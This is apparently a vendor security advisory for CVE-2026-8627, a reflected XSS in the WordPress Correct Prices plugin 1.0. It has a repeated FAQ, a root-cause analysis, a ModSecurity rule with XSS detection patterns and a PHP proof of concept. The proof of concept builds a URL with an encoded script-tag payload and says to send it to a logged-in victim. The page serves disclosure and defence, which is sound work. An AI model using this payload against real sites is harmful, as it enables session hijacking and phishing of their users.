What is CVE-2026-8627?

CVE-2026-8627 is a reflected cross-site scripting (XSS) vulnerability found in the Correct Prices plugin for WordPress, specifically in version 1.0. It allows unauthenticated attackers to inject arbitrary web scripts via the PHP_SELF parameter due to a lack of input sanitization.

How does this vulnerability work?

The vulnerability occurs when the correct_prices_page() function echoes the $_SERVER[‘PHP_SELF’] variable into a form’s action attribute without proper escaping. An attacker can craft a URL that includes malicious script code, which is then executed when a user interacts with the page.

Who is affected by this vulnerability?

WordPress sites using the Correct Prices plugin version 1.0 are affected by this vulnerability. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify that you are using the Correct Prices plugin version 1.0. Additionally, you can test the plugin’s functionality by attempting to inject a payload through the PHP_SELF parameter in the URL.

How can I mitigate this vulnerability?

To mitigate this vulnerability, you should escape the PHP_SELF value using esc_url() or esc_attr() functions in the plugin code. Additionally, consider using admin_url() with a fixed path instead of relying on PHP_SELF for form actions.

What is the risk level associated with this vulnerability?

The CVSS score for CVE-2026-8627 is 6.1, classified as medium severity. This indicates a moderate risk where an attacker can exploit the vulnerability to inject scripts, potentially leading to session hijacking or phishing.

What practical implications does the medium severity rating have?

A medium severity rating means that while the vulnerability can be exploited, it requires user interaction to trigger the attack. This lowers the immediate risk but still necessitates prompt action to secure the site.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a malicious URL that exploits the vulnerability by appending a payload to the PHP_SELF parameter. It shows how the injected script can be executed when a user clicks the link.

Is there a patched version available?

As of now, there is no patched version of the Correct Prices plugin that addresses CVE-2026-8627. Administrators should implement virtual patching or alternative mitigation strategies until an official update is released.

What should I do if I cannot update the plugin?

If you cannot update the plugin, consider disabling it temporarily or implementing a web application firewall (WAF) to filter out malicious requests. Regularly monitor your site for unusual activity as an additional precaution.

How can I report my findings about this vulnerability?

If you discover additional details or exploits related to CVE-2026-8627, you can report your findings to the plugin developers or through a responsible disclosure program to ensure the issue is addressed properly.

Where can I find more information about this vulnerability?

More information about CVE-2026-8627 can be found on the National Vulnerability Database (NVD) or security advisory sites that track WordPress vulnerabilities. Keeping abreast of security updates from the WordPress community is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2026-8627: Correct Prices <= 1.0 – Reflected Cross-Site Scripting via PHP_SELF Parameter (correct-prices)

CVE ID CVE-2026-8627

Plugin correct-prices

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.0

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8627 (metadata-based): The Correct Prices plugin for WordPress, version 1.0, contains a Reflected Cross-Site Scripting (XSS) vulnerability via the PHP_SELF parameter. An unauthenticated attacker can inject arbitrary web scripts by tricking a user into clicking a crafted link. The CVSS score is 6.1 (Medium), reflecting low impact to confidentiality and integrity with low attack complexity.

The root cause is the correct_prices_page() function, which echoes $_SERVER[‘PHP_SELF’] into a form’s action attribute without sanitization or output escaping. PHP_SELF contains the script name plus any path-info appended to the URL. The plugin lacks calls to esc_url(), esc_attr(), or similar WordPress escaping functions. Atomic Edge analysis confirms this inference from the CWE-79 classification and the description, as no code diff is available.

Exploitation occurs by crafting a URL with path-info containing a payload that breaks out of the form action attribute. For example, appending ‘/%22%3E%3Cscript%3Ealert(1)%3C/script%3E’ to the plugin’s admin page URL injects a script tag. The attack requires user interaction (clicking the link). The plugin does not implement nonce verification or capability checks for this function, allowing unauthenticated exploitation.

Remediation requires escaping the PHP_SELF value before output. The fix should use esc_url() for the action attribute or esc_attr() for attribute context. Developers should avoid relying on PHP_SELF for form actions; using admin_url() with a fixed path is more secure. No patched version exists, making virtual patching critical.

If exploited, this vulnerability allows an attacker to inject arbitrary HTML and JavaScript into the affected page. This can lead to session hijacking, phishing, or defacement. No direct privilege escalation, data exfiltration, or remote code execution is achievable.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-8627 (metadata-based)
# Block XSS attempts via PHP_SELF path-info injection in Correct Prices plugin
SecRule REQUEST_URI "@rx ^/wp-admin/admin.php" 
  "id:20260001,phase:2,deny,status:403,chain,msg:'CVE-2026-8627 XSS via PHP_SELF in Correct Prices plugin',severity:'CRITICAL',tag:'wordpress',tag:'CVE-2026-8627'"
  SecRule QUERY_STRING "@rx page=correct-prices" 
    "chain"
    SecRule REQUEST_URI_RAW "@rx %22|%3E|%3C|script|onerror|onload|javascript:" 
      "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8627 - Correct Prices <= 1.0 - Reflected Cross-Site Scripting via PHP_SELF Parameter

// Configuration: Set the target WordPress admin URL where the vulnerable page is located
$target_url = "http://example.com/wp-admin/admin.php?page=correct-prices";

// The payload is injected via path-info appended to the URL.
// The vulnerable function echoes $_SERVER['PHP_SELF'] into a form's action attribute.
// We break out of the attribute and inject a script tag.
$payload = '/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E';

// Construct the malicious URL
$malicious_url = $target_url . $payload;

echo "[+] Atomic Edge Research - CVE-2026-8627 PoCn";
echo "[+] Target: $target_urln";
echo "[+] Malicious URL: $malicious_urlnn";

echo "[!] Send this URL to a victim with an active WordPress session.n";
echo "[!] The PHP_SELF parameter will reflect the payload into the form action.n";
echo "[!] When the form is rendered, the script will execute in the victim's browser.nn";

// Optional: Use cURL to verify reflection (not required for exploitation)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, session_name() . '=' . session_id()); // Replace with actual session cookie if needed

$response = curl_exec($ch);
curl_close($ch);

// Check if the payload appears in the response
if (strpos($response, '%22%3E%3Cscript%3E') !== false || strpos($response, '"><script>alert("XSS")</script>') !== false) {
    echo "[+] XSS payload reflected successfully.n";
} else {
    echo "[-] Payload not reflected. The plugin may have been modified or the path is incorrect.n";
}
?>

Frequently Asked Questions

What is CVE-2026-8627?
Overview of the vulnerability
CVE-2026-8627 is a reflected cross-site scripting (XSS) vulnerability found in the Correct Prices plugin for WordPress, specifically in version 1.0. It allows unauthenticated attackers to inject arbitrary web scripts via the PHP_SELF parameter due to a lack of input sanitization.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability occurs when the correct_prices_page() function echoes the $_SERVER[‘PHP_SELF’] variable into a form’s action attribute without proper escaping. An attacker can craft a URL that includes malicious script code, which is then executed when a user interacts with the page.
Who is affected by this vulnerability?
Identifying affected users
WordPress sites using the Correct Prices plugin version 1.0 are affected by this vulnerability. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify that you are using the Correct Prices plugin version 1.0. Additionally, you can test the plugin’s functionality by attempting to inject a payload through the PHP_SELF parameter in the URL.
How can I mitigate this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, you should escape the PHP_SELF value using esc_url() or esc_attr() functions in the plugin code. Additionally, consider using admin_url() with a fixed path instead of relying on PHP_SELF for form actions.
What is the risk level associated with this vulnerability?
Understanding the CVSS score
The CVSS score for CVE-2026-8627 is 6.1, classified as medium severity. This indicates a moderate risk where an attacker can exploit the vulnerability to inject scripts, potentially leading to session hijacking or phishing.
What practical implications does the medium severity rating have?
Real-world impact
A medium severity rating means that while the vulnerability can be exploited, it requires user interaction to trigger the attack. This lowers the immediate risk but still necessitates prompt action to secure the site.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can craft a malicious URL that exploits the vulnerability by appending a payload to the PHP_SELF parameter. It shows how the injected script can be executed when a user clicks the link.
Is there a patched version available?
Current status of the plugin
As of now, there is no patched version of the Correct Prices plugin that addresses CVE-2026-8627. Administrators should implement virtual patching or alternative mitigation strategies until an official update is released.
What should I do if I cannot update the plugin?
Alternative security measures
If you cannot update the plugin, consider disabling it temporarily or implementing a web application firewall (WAF) to filter out malicious requests. Regularly monitor your site for unusual activity as an additional precaution.
How can I report my findings about this vulnerability?
Responsible disclosure
If you discover additional details or exploits related to CVE-2026-8627, you can report your findings to the plugin developers or through a responsible disclosure program to ensure the issue is addressed properly.
Where can I find more information about this vulnerability?
Additional resources
More information about CVE-2026-8627 can be found on the National Vulnerability Database (NVD) or security advisory sites that track WordPress vulnerabilities. Keeping abreast of security updates from the WordPress community is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations